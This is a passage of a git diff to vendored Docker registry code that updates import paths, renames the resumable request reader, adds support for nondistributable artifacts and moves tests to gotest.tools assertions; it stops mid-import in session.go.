b/vendor/github.com/docker/docker/registry/registry_mock_test.go @@ -1,6 +1,4 @@ -// +build !solaris - -package registry +package registry // import "github.com/docker/docker/registry" import ( "encoding/json" @@ -17,11 +15,11 @@ import ( "testing" "time" + "github.com/docker/distribution/reference" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" "github.com/gorilla/mux" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) var ( @@ -175,7 +173,7 @@ func makePublicIndex() *registrytypes.IndexInfo { return index } -func makeServiceConfig(mirrors []string, insecureRegistries []string) *serviceConfig { +func makeServiceConfig(mirrors []string, insecureRegistries []string) (*serviceConfig, error) { options := ServiceOptions{ Mirrors: mirrors, InsecureRegistries: insecureRegistries, @@ -432,7 +430,7 @@ func handlerImages(w http.ResponseWriter, r *http.Request) { writeResponse(w, "", 204) return } - images := []map[string]string{} + var images []map[string]string for imageID, layer := range testLayers { image := make(map[string]string) image["id"] = imageID diff --git a/vendor/github.com/docker/docker/registry/registry_test.go b/vendor/github.com/docker/docker/registry/registry_test.go index 786dfbed40..b7459471b3 100644 --- a/vendor/github.com/docker/docker/registry/registry_test.go +++ b/vendor/github.com/docker/docker/registry/registry_test.go @@ -1,19 +1,20 @@ -// +build !solaris - -package registry +package registry // import "github.com/docker/docker/registry" import ( "fmt" "net/http" "net/http/httputil" "net/url" + "os" "strings" "testing" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/client/transport" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" + "gotest.tools/assert" + "gotest.tools/skip" ) var ( @@ -33,7 +34,7 @@ func spawnTestRegistrySession(t *testing.T) *Session { } userAgent := "docker test client" var tr http.RoundTripper = debugTransport{NewTransport(nil), t.Log} - tr = transport.NewTransport(AuthTransport(tr, authConfig, false), DockerHeaders(userAgent, nil)...) + tr = transport.NewTransport(AuthTransport(tr, authConfig, false), Headers(userAgent, nil)...) client := HTTPClient(tr) r, err := NewSession(client, authConfig, endpoint) if err != nil { @@ -54,6 +55,7 @@ func spawnTestRegistrySession(t *testing.T) *Session { } func TestPingRegistryEndpoint(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") testPing := func(index *registrytypes.IndexInfo, expectedStandalone bool, assertMessage string) { ep, err := NewV1Endpoint(index, "", nil) if err != nil { @@ -73,6 +75,7 @@ func TestPingRegistryEndpoint(t *testing.T) { } func TestEndpoint(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") // Simple wrapper to fail test if err != nil expandEndpoint := func(index *registrytypes.IndexInfo) *V1Endpoint { endpoint, err := NewV1Endpoint(index, "", nil) @@ -201,7 +204,7 @@ func TestGetRemoteImageLayer(t *testing.T) { func TestGetRemoteTag(t *testing.T) { r := spawnTestRegistrySession(t) - repoRef, err := reference.ParseNamed(REPO) + repoRef, err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -211,7 +214,7 @@ func TestGetRemoteTag(t *testing.T) { } assertEqual(t, tag, imageID, "Expected tag test to map to "+imageID) - bazRef, err := reference.ParseNamed("foo42/baz") + bazRef, err := reference.ParseNormalizedNamed("foo42/baz") if err != nil { t.Fatal(err) } @@ -223,7 +226,7 @@ func TestGetRemoteTag(t *testing.T) { func TestGetRemoteTags(t *testing.T) { r := spawnTestRegistrySession(t) - repoRef, err := reference.ParseNamed(REPO) + repoRef, err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -235,7 +238,7 @@ func TestGetRemoteTags(t *testing.T) { assertEqual(t, tags["latest"], imageID, "Expected tag latest to map to "+imageID) assertEqual(t, tags["test"], imageID, "Expected tag test to map to "+imageID) - bazRef, err := reference.ParseNamed("foo42/baz") + bazRef, err := reference.ParseNormalizedNamed("foo42/baz") if err != nil { t.Fatal(err) } @@ -252,7 +255,7 @@ func TestGetRepositoryData(t *testing.T) { t.Fatal(err) } host := "http://" + parsedURL.Host + "/v1/" - repoRef, err := reference.ParseNamed(REPO) + repoRef, err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -505,7 +508,7 @@ func TestParseRepositoryInfo(t *testing.T) { } for reposName, expectedRepoInfo := range expectedRepoInfos { - named, err := reference.WithName(reposName) + named, err := reference.ParseNormalizedNamed(reposName) if err != nil { t.Error(err) } @@ -515,9 +518,9 @@ func TestParseRepositoryInfo(t *testing.T) { t.Error(err) } else { checkEqual(t, repoInfo.Index.Name, expectedRepoInfo.Index.Name, reposName) - checkEqual(t, repoInfo.RemoteName(), expectedRepoInfo.RemoteName, reposName) - checkEqual(t, repoInfo.Name(), expectedRepoInfo.LocalName, reposName) - checkEqual(t, repoInfo.FullName(), expectedRepoInfo.CanonicalName, reposName) + checkEqual(t, reference.Path(repoInfo.Name), expectedRepoInfo.RemoteName, reposName) + checkEqual(t, reference.FamiliarName(repoInfo.Name), expectedRepoInfo.LocalName, reposName) + checkEqual(t, repoInfo.Name.Name(), expectedRepoInfo.CanonicalName, reposName) checkEqual(t, repoInfo.Index.Official, expectedRepoInfo.Index.Official, reposName) checkEqual(t, repoInfo.Official, expectedRepoInfo.Official, reposName) } @@ -539,8 +542,8 @@ func TestNewIndexInfo(t *testing.T) { } } - config := newServiceConfig(ServiceOptions{}) - noMirrors := []string{} + config := emptyServiceConfig + var noMirrors []string expectedIndexInfos := map[string]*registrytypes.IndexInfo{ IndexName: { Name: IndexName, @@ -570,7 +573,11 @@ func TestNewIndexInfo(t *testing.T) { testIndexInfo(config, expectedIndexInfos) publicMirrors := []string{"http://mirror1.local", "http://mirror2.local"} - config = makeServiceConfig(publicMirrors, []string{"example.com"}) + var err error + config, err = makeServiceConfig(publicMirrors, []string{"example.com"}) + if err != nil { + t.Fatal(err) + } expectedIndexInfos = map[string]*registrytypes.IndexInfo{ IndexName: { @@ -618,7 +625,10 @@ func TestNewIndexInfo(t *testing.T) { } testIndexInfo(config, expectedIndexInfos) - config = makeServiceConfig(nil, []string{"42.42.0.0/16"}) + config, err = makeServiceConfig(nil, []string{"42.42.0.0/16"}) + if err != nil { + t.Fatal(err) + } expectedIndexInfos = map[string]*registrytypes.IndexInfo{ "example.com": { Name: "example.com", @@ -655,6 +665,7 @@ func TestNewIndexInfo(t *testing.T) { } func TestMirrorEndpointLookup(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") containsMirror := func(endpoints []APIEndpoint) bool { for _, pe := range endpoints { if pe.URL.Host == "my.mirror" { @@ -663,13 +674,17 @@ func TestMirrorEndpointLookup(t *testing.T) { } return false } - s := DefaultService{config: makeServiceConfig([]string{"my.mirror"}, nil)} + cfg, err := makeServiceConfig([]string{"https://my.mirror"}, nil) + if err != nil { + t.Fatal(err) + } + s := DefaultService{config: cfg} imageName, err := reference.WithName(IndexName + "/test/image") if err != nil { t.Error(err) } - pushAPIEndpoints, err := s.LookupPushEndpoints(imageName.Hostname()) + pushAPIEndpoints, err := s.LookupPushEndpoints(reference.Domain(imageName)) if err != nil { t.Fatal(err) } @@ -677,7 +692,7 @@ func TestMirrorEndpointLookup(t *testing.T) { t.Fatal("Push endpoint should not contain mirror") } - pullAPIEndpoints, err := s.LookupPullEndpoints(imageName.Hostname()) + pullAPIEndpoints, err := s.LookupPullEndpoints(reference.Domain(imageName)) if err != nil { t.Fatal(err) } @@ -688,7 +703,7 @@ func TestMirrorEndpointLookup(t *testing.T) { func TestPushRegistryTag(t *testing.T) { r := spawnTestRegistrySession(t) - repoRef, err := reference.ParseNamed(REPO) + repoRef, err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -710,7 +725,7 @@ func TestPushImageJSONIndex(t *testing.T) { Checksum: "sha256:bea7bf2e4bacd479344b737328db47b18880d09096e6674165533aa994f5e9f2", }, } - repoRef, err := reference.ParseNamed(REPO) + repoRef, err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -747,16 +762,12 @@ func TestSearchRepositories(t *testing.T) { func TestTrustedLocation(t *testing.T) { for _, url := range []string{"http://example.com", "https://example.com:7777", "http://docker.io", "http://test.docker.com", "https://fakedocker.com"} { req, _ := http.NewRequest("GET", url, nil) - if trustedLocation(req) == true { - t.Fatalf("'%s' shouldn't be detected as a trusted location", url) - } + assert.Check(t, !trustedLocation(req)) } for _, url := range []string{"https://docker.io", "https://test.docker.com:80"} { req, _ := http.NewRequest("GET", url, nil) - if trustedLocation(req) == false { - t.Fatalf("'%s' should be detected as a trusted location", url) - } + assert.Check(t, trustedLocation(req)) } } @@ -811,6 +822,51 @@ func TestAddRequiredHeadersToRedirectedRequests(t *testing.T) { } } +func TestAllowNondistributableArtifacts(t *testing.T) { + tests := []struct { + addr string + registries []string + expected bool + }{ + {IndexName, nil, false}, + {"example.com", []string{}, false}, + {"example.com", []string{"example.com"}, true}, + {"localhost", []string{"localhost:5000"}, false}, + {"localhost:5000", []string{"localhost:5000"}, true}, + {"localhost", []string{"example.com"}, false}, + {"127.0.0.1:5000", []string{"127.0.0.1:5000"}, true}, + {"localhost", nil, false}, + {"localhost:5000", nil, false}, + {"127.0.0.1", nil, false}, + {"localhost", []string{"example.com"}, false}, + {"127.0.0.1", []string{"example.com"}, false}, + {"example.com", nil, false}, + {"example.com", []string{"example.com"}, true}, + {"127.0.0.1", []string{"example.com"}, false}, + {"127.0.0.1:5000", []string{"example.com"}, false}, + {"example.com:5000", []string{"42.42.0.0/16"}, true}, + {"example.com", []string{"42.42.0.0/16"}, true}, + {"example.com:5000", []string{"42.42.42.42/8"}, true}, + {"127.0.0.1:5000", []string{"127.0.0.0/8"}, true}, + {"42.42.42.42:5000", []string{"42.1.1.1/8"}, true}, + {"invalid.domain.com", []string{"42.42.0.0/16"}, false}, + {"invalid.domain.com", []string{"invalid.domain.com"}, true}, + {"invalid.domain.com:5000", []string{"invalid.domain.com"}, false}, + {"invalid.domain.com:5000", []string{"invalid.domain.com:5000"}, true}, + } + for _, tt := range tests { + config, err := newServiceConfig(ServiceOptions{ + AllowNondistributableArtifacts: tt.registries, + }) + if err != nil { + t.Error(err) + } + if v := allowNondistributableArtifacts(config, tt.addr); v != tt.expected { + t.Errorf("allowNondistributableArtifacts failed for %q %v, expected %v got %v", tt.addr, tt.registries, tt.expected, v) + } + } +} + func TestIsSecureIndex(t *testing.T) { tests := []struct { addr string @@ -844,7 +900,10 @@ func TestIsSecureIndex(t *testing.T) { {"invalid.domain.com:5000", []string{"invalid.domain.com:5000"}, false}, } for _, tt := range tests { - config := makeServiceConfig(nil, tt.insecureRegistries) + config, err := makeServiceConfig(nil, tt.insecureRegistries) + if err != nil { + t.Error(err) + } if sec := isSecureIndex(config, tt.addr); sec != tt.expected { t.Errorf("isSecureIndex failed for %q %v, expected %v got %v", tt.addr, tt.insecureRegistries, tt.expected, sec) } diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader.go similarity index 62% rename from vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go rename to vendor/github.com/docker/docker/registry/resumable/resumablerequestreader.go index bebc8608cd..8e97a1a4d1 100644 --- a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go +++ b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader.go @@ -1,4 +1,4 @@ -package httputils +package resumable // import "github.com/docker/docker/registry/resumable" import ( "fmt" @@ -6,10 +6,10 @@ import ( "net/http" "time" - "github.com/Sirupsen/logrus" + "github.com/sirupsen/logrus" ) -type resumableRequestReader struct { +type requestReader struct { client *http.Client request *http.Request lastRange int64 @@ -17,30 +17,31 @@ type resumableRequestReader struct { currentResponse *http.Response failures uint32 maxFailures uint32 + waitDuration time.Duration } -// ResumableRequestReader makes it possible to resume reading a request's body transparently +// NewRequestReader makes it possible to resume reading a request's body transparently // maxfail is the number of times we retry to make requests again (not resumes) // totalsize is the total length of the body; auto detect if not provided -func ResumableRequestReader(c *http.Client, r *http.Request, maxfail uint32, totalsize int64) io.ReadCloser { - return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize} +func NewRequestReader(c *http.Client, r *http.Request, maxfail uint32, totalsize int64) io.ReadCloser { + return &requestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, waitDuration: 5 * time.Second} } -// ResumableRequestReaderWithInitialResponse makes it possible to resume +// NewRequestReaderWithInitialResponse makes it possible to resume // reading the body of an already initiated request. -func ResumableRequestReaderWithInitialResponse(c *http.Client, r *http.Request, maxfail uint32, totalsize int64, initialResponse *http.Response) io.ReadCloser { - return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, currentResponse: initialResponse} +func NewRequestReaderWithInitialResponse(c *http.Client, r *http.Request, maxfail uint32, totalsize int64, initialResponse *http.Response) io.ReadCloser { + return &requestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, currentResponse: initialResponse, waitDuration: 5 * time.Second} } -func (r *resumableRequestReader) Read(p []byte) (n int, err error) { +func (r *requestReader) Read(p []byte) (n int, err error) { if r.client == nil || r.request == nil { - return 0, fmt.Errorf("client and request can't be nil\n") + return 0, fmt.Errorf("client and request can't be nil") } isFreshRequest := false if r.lastRange != 0 && r.currentResponse == nil { readRange := fmt.Sprintf("bytes=%d-%d", r.lastRange, r.totalSize) r.request.Header.Set("Range", readRange) - time.Sleep(5 * time.Second) + time.Sleep(r.waitDuration) } if r.currentResponse == nil { r.currentResponse, err = r.client.Do(r.request) @@ -49,7 +50,7 @@ func (r *resumableRequestReader) Read(p []byte) (n int, err error) { if err != nil && r.failures+1 != r.maxFailures { r.cleanUpResponse() r.failures++ - time.Sleep(5 * time.Duration(r.failures) * time.Second) + time.Sleep(time.Duration(r.failures) * r.waitDuration) return 0, nil } else if err != nil { r.cleanUpResponse() @@ -80,14 +81,14 @@ func (r *resumableRequestReader) Read(p []byte) (n int, err error) { return n, err } -func (r *resumableRequestReader) Close() error { +func (r *requestReader) Close() error { r.cleanUpResponse() r.client = nil r.request = nil return nil } -func (r *resumableRequestReader) cleanUpResponse() { +func (r *requestReader) cleanUpResponse() { if r.currentResponse != nil { r.currentResponse.Body.Close() r.currentResponse = nil diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader_test.go similarity index 68% rename from vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go rename to vendor/github.com/docker/docker/registry/resumable/resumablerequestreader_test.go index 5a2906db77..c72c210e77 100644 --- a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go +++ b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader_test.go @@ -1,4 +1,4 @@ -package httputils +package resumable // import "github.com/docker/docker/registry/resumable" import ( "fmt" @@ -8,6 +8,10 @@ import ( "net/http/httptest" "strings" "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestResumableRequestHeaderSimpleErrors(t *testing.T) { @@ -20,28 +24,19 @@ func TestResumableRequestHeaderSimpleErrors(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - expectedError := "client and request can't be nil\n" - resreq := &resumableRequestReader{} + resreq := &requestReader{} _, err = resreq.Read([]byte{}) - if err == nil || err.Error() != expectedError { - t.Fatalf("Expected an error with '%s', got %v.", expectedError, err) - } + assert.Check(t, is.Error(err, "client and request can't be nil")) - resreq = &resumableRequestReader{ + resreq = &requestReader{ client: client, request: req, totalSize: -1, } - expectedError = "failed to auto detect content length" _, err = resreq.Read([]byte{}) - if err == nil || err.Error() != expectedError { - t.Fatalf("Expected an error with '%s', got %v.", expectedError, err) - } - + assert.Check(t, is.Error(err, "failed to auto detect content length")) } // Not too much failures, bails out after some wait @@ -50,20 +45,18 @@ func TestResumableRequestHeaderNotTooMuchFailures(t *testing.T) { var badReq *http.Request badReq, err := http.NewRequest("GET", "I'm not an url", nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - resreq := &resumableRequestReader{ - client: client, - request: badReq, - failures: 0, - maxFailures: 2, + resreq := &requestReader{ + client: client, + request: badReq, + failures: 0, + maxFailures: 2, + waitDuration: 10 * time.Millisecond, } read, err := resreq.Read([]byte{}) - if err != nil || read != 0 { - t.Fatalf("Expected no error and no byte read, got err:%v, read:%v.", err, read) - } + assert.NilError(t, err) + assert.Check(t, is.Equal(0, read)) } // Too much failures, returns the error @@ -72,11 +65,9 @@ func TestResumableRequestHeaderTooMuchFailures(t *testing.T) { var badReq *http.Request badReq, err := http.NewRequest("GET", "I'm not an url", nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - resreq := &resumableRequestReader{ + resreq := &requestReader{ client: client, request: badReq, failures: 0, @@ -86,9 +77,8 @@ func TestResumableRequestHeaderTooMuchFailures(t *testing.T) { expectedError := `Get I%27m%20not%20an%20url: unsupported protocol scheme ""` read, err := resreq.Read([]byte{}) - if err == nil || err.Error() != expectedError || read != 0 { - t.Fatalf("Expected the error '%s', got err:%v, read:%v.", expectedError, err, read) - } + assert.Check(t, is.Error(err, expectedError)) + assert.Check(t, is.Equal(0, read)) } type errorReaderCloser struct{} @@ -103,9 +93,7 @@ func (errorReaderCloser) Read(p []byte) (n int, err error) { func TestResumableRequestReaderWithReadError(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", "", nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} @@ -117,7 +105,7 @@ func TestResumableRequestReaderWithReadError(t *testing.T) { Body: errorReaderCloser{}, } - resreq := &resumableRequestReader{ + resreq := &requestReader{ client: client, request: req, currentResponse: response, @@ -128,21 +116,15 @@ func TestResumableRequestReaderWithReadError(t *testing.T) { buf := make([]byte, 1) read, err := resreq.Read(buf) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - if read != 0 { - t.Fatalf("Expected to have read nothing, but read %v", read) - } + assert.Check(t, is.Equal(0, read)) } func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", "", nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} @@ -154,7 +136,7 @@ func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) { Body: ioutil.NopCloser(strings.NewReader("")), } - resreq := &resumableRequestReader{ + resreq := &requestReader{ client: client, request: req, currentResponse: response, @@ -165,9 +147,7 @@ func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) { buf := make([]byte, 1) _, err = resreq.Read(buf) - if err == nil || err != io.EOF { - t.Fatalf("Expected an io.EOF error, got %v", err) - } + assert.Check(t, is.Error(err, io.EOF.Error())) } func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) { @@ -180,13 +160,11 @@ func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} - resreq := &resumableRequestReader{ + resreq := &requestReader{ client: client, request: req, lastRange: 1, @@ -195,13 +173,10 @@ func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) { buf := make([]byte, 2) _, err = resreq.Read(buf) - if err == nil || err.Error() != "the server doesn't support byte ranges" { - t.Fatalf("Expected an error 'the server doesn't support byte ranges', got %v", err) - } + assert.Check(t, is.Error(err, "the server doesn't support byte ranges")) } func TestResumableRequestReaderWithZeroTotalSize(t *testing.T) { - srvtxt := "some response text data" ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { @@ -211,30 +186,22 @@ func TestResumableRequestReaderWithZeroTotalSize(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} retries := uint32(5) - resreq := ResumableRequestReader(client, req, retries, 0) + resreq := NewRequestReader(client, req, retries, 0) defer resreq.Close() data, err := ioutil.ReadAll(resreq) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) resstr := strings.TrimSuffix(string(data), "\n") - - if resstr != srvtxt { - t.Errorf("resstr != srvtxt") - } + assert.Check(t, is.Equal(srvtxt, resstr)) } func TestResumableRequestReader(t *testing.T) { - srvtxt := "some response text data" ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { @@ -244,31 +211,23 @@ func TestResumableRequestReader(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} retries := uint32(5) imgSize := int64(len(srvtxt)) - resreq := ResumableRequestReader(client, req, retries, imgSize) + resreq := NewRequestReader(client, req, retries, imgSize) defer resreq.Close() data, err := ioutil.ReadAll(resreq) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) resstr := strings.TrimSuffix(string(data), "\n") - - if resstr != srvtxt { - t.Errorf("resstr != srvtxt") - } + assert.Check(t, is.Equal(srvtxt, resstr)) } func TestResumableRequestReaderWithInitialResponse(t *testing.T) { - srvtxt := "some response text data" ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { @@ -278,30 +237,21 @@ func TestResumableRequestReaderWithInitialResponse(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} retries := uint32(5) imgSize := int64(len(srvtxt)) res, err := client.Do(req) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - resreq := ResumableRequestReaderWithInitialResponse(client, req, retries, imgSize, res) + resreq := NewRequestReaderWithInitialResponse(client, req, retries, imgSize, res) defer resreq.Close() data, err := ioutil.ReadAll(resreq) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) resstr := strings.TrimSuffix(string(data), "\n") - - if resstr != srvtxt { - t.Errorf("resstr != srvtxt") - } + assert.Check(t, is.Equal(srvtxt, resstr)) } diff --git a/vendor/github.com/docker/docker/registry/service.go b/vendor/github.com/docker/docker/registry/service.go index 596a9c7e5f..b441970ff1 100644 --- a/vendor/github.com/docker/docker/registry/service.go +++ b/vendor/github.com/docker/docker/registry/service.go @@ -1,20 +1,20 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( + "context" "crypto/tls" - "fmt" "net/http" "net/url" "strings" "sync" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/client/auth" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const ( @@ -31,6 +31,8 @@ type Service interface { Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) ServiceConfig() *registrytypes.ServiceConfig TLSConfig(hostname string) (*tls.Config, error) + LoadAllowNondistributableArtifacts([]string) error + LoadMirrors([]string) error LoadInsecureRegistries([]string) error } @@ -43,10 +45,10 @@ type DefaultService struct { // NewService returns a new instance of DefaultService ready to be // installed into an engine. -func NewService(options ServiceOptions) *DefaultService { - return &DefaultService{ - config: newServiceConfig(options), - } +func NewService(options ServiceOptions) (*DefaultService, error) { + config, err := newServiceConfig(options) + + return &DefaultService{config: config}, err } // ServiceConfig returns the public registry service configuration. @@ -55,13 +57,17 @@ func (s *DefaultService) ServiceConfig() *registrytypes.ServiceConfig { defer s.mu.Unlock() servConfig := registrytypes.ServiceConfig{ - InsecureRegistryCIDRs: make([]*(registrytypes.NetIPNet), 0), - IndexConfigs: make(map[string]*(registrytypes.IndexInfo)), - Mirrors: make([]string, 0), + AllowNondistributableArtifactsCIDRs: make([]*(registrytypes.NetIPNet), 0), + AllowNondistributableArtifactsHostnames: make([]string, 0), + InsecureRegistryCIDRs: make([]*(registrytypes.NetIPNet), 0), + IndexConfigs: make(map[string]*(registrytypes.IndexInfo)), + Mirrors: make([]string, 0), } // construct a new ServiceConfig which will not retrieve s.Config directly, // and look up items in s.config with mu locked + servConfig.AllowNondistributableArtifactsCIDRs = append(servConfig.AllowNondistributableArtifactsCIDRs, s.config.ServiceConfig.AllowNondistributableArtifactsCIDRs...) + servConfig.AllowNondistributableArtifactsHostnames = append(servConfig.AllowNondistributableArtifactsHostnames, s.config.ServiceConfig.AllowNondistributableArtifactsHostnames...) servConfig.InsecureRegistryCIDRs = append(servConfig.InsecureRegistryCIDRs, s.config.ServiceConfig.InsecureRegistryCIDRs...) for key, value := range s.config.ServiceConfig.IndexConfigs { @@ -73,6 +79,22 @@ func (s *DefaultService) ServiceConfig() *registrytypes.ServiceConfig { return &servConfig } +// LoadAllowNondistributableArtifacts loads allow-nondistributable-artifacts registries for Service. +func (s *DefaultService) LoadAllowNondistributableArtifacts(registries []string) error { + s.mu.Lock() + defer s.mu.Unlock() + + return s.config.LoadAllowNondistributableArtifacts(registries) +} + +// LoadMirrors loads registry mirrors for Service +func (s *DefaultService) LoadMirrors(mirrors []string) error { + s.mu.Lock() + defer s.mu.Unlock() + + return s.config.LoadMirrors(mirrors) +} + // LoadInsecureRegistries loads insecure registries for Service func (s *DefaultService) LoadInsecureRegistries(registries []string) error { s.mu.Lock() @@ -95,12 +117,12 @@ func (s *DefaultService) Auth(ctx context.Context, authConfig *types.AuthConfig, } u, err := url.Parse(serverAddress) if err != nil { - return "", "", fmt.Errorf("unable to parse server address: %v", err) + return "", "", errdefs.InvalidParameter(errors.Errorf("unable to parse server address: %v", err)) } endpoints, err := s.LookupPushEndpoints(u.Host) if err != nil { - return "", "", err + return "", "", errdefs.InvalidParameter(err) } for _, endpoint := range endpoints { @@ -118,6 +140,7 @@ func (s *DefaultService) Auth(ctx context.Context, authConfig *types.AuthConfig, logrus.Infof("Error logging in to %s endpoint, trying next endpoint: %v", endpoint.Version, err) continue } + return "", "", err } @@ -176,7 +199,7 @@ func (s *DefaultService) Search(ctx context.Context, term string, limit int, aut }, } - modifiers := DockerHeaders(userAgent, nil) + modifiers := Headers(userAgent, nil) v2Client, foundV2, err := v2AuthHTTPClient(endpoint.URL, endpoint.client.Transport, modifiers, creds, scopes) if err != nil { if fErr, ok := err.(fallbackError); ok { @@ -226,16 +249,17 @@ func (s *DefaultService) ResolveRepository(name reference.Named) (*RepositoryInf // APIEndpoint represents a remote API endpoint type APIEndpoint struct { - Mirror bool - URL *url.URL - Version APIVersion - Official bool - TrimHostname bool - TLSConfig *tls.Config + Mirror bool + URL *url.URL + Version APIVersion + AllowNondistributableArtifacts bool + Official bool + TrimHostname bool + TLSConfig *tls.Config } // ToV1Endpoint returns a V1 API endpoint based on the APIEndpoint -func (e APIEndpoint) ToV1Endpoint(userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { +func (e APIEndpoint) ToV1Endpoint(userAgent string, metaHeaders http.Header) *V1Endpoint { return newV1Endpoint(*e.URL, e.TLSConfig, userAgent, metaHeaders) } diff --git a/vendor/github.com/docker/docker/registry/service_v1.go b/vendor/github.com/docker/docker/registry/service_v1.go index 1d251aec6e..d955ec51fb 100644 --- a/vendor/github.com/docker/docker/registry/service_v1.go +++ b/vendor/github.com/docker/docker/registry/service_v1.go @@ -1,4 +1,4 @@ -package registry +package registry // import "github.com/docker/docker/registry" import "net/url" diff --git a/vendor/github.com/docker/docker/registry/service_v1_test.go b/vendor/github.com/docker/docker/registry/service_v1_test.go index bd15dfffb8..11861f7c05 100644 --- a/vendor/github.com/docker/docker/registry/service_v1_test.go +++ b/vendor/github.com/docker/docker/registry/service_v1_test.go @@ -1,9 +1,18 @@ -package registry +package registry // import "github.com/docker/docker/registry" -import "testing" +import ( + "os" + "testing" + + "gotest.tools/skip" +) func TestLookupV1Endpoints(t *testing.T) { - s := NewService(ServiceOptions{}) + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + s, err := NewService(ServiceOptions{}) + if err != nil { + t.Fatal(err) + } cases := []struct { hostname string diff --git a/vendor/github.com/docker/docker/registry/service_v2.go b/vendor/github.com/docker/docker/registry/service_v2.go index 228d745f8c..3a56dc9114 100644 --- a/vendor/github.com/docker/docker/registry/service_v2.go +++ b/vendor/github.com/docker/docker/registry/service_v2.go @@ -1,4 +1,4 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "net/url" @@ -44,6 +44,8 @@ func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndp return endpoints, nil } + ana := allowNondistributableArtifacts(s.config, hostname) + tlsConfig, err = s.tlsConfig(hostname) if err != nil { return nil, err @@ -55,9 +57,10 @@ func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndp Scheme: "https", Host: hostname, }, - Version: APIVersion2, - TrimHostname: true, - TLSConfig: tlsConfig, + Version: APIVersion2, + AllowNondistributableArtifacts: ana, + TrimHostname: true, + TLSConfig: tlsConfig, }, } @@ -67,8 +70,9 @@ func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndp Scheme: "http", Host: hostname, }, - Version: APIVersion2, - TrimHostname: true, + Version: APIVersion2, + AllowNondistributableArtifacts: ana, + TrimHostname: true, // used to check if supposed to be secure via InsecureSkipVerify TLSConfig: tlsConfig, }) diff --git a/vendor/github.com/docker/docker/registry/session.go b/vendor/github.com/docker/docker/registry/session.go index 72e286ab44..ef14299594 100644 --- a/vendor/github.com/docker/docker/registry/session.go +++ b/vendor/github.com/docker/docker/registry/session.go @@ -1,10 +1,8 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "bytes" "crypto/sha256" - "errors" - "sync" // this is required for some certificates _ 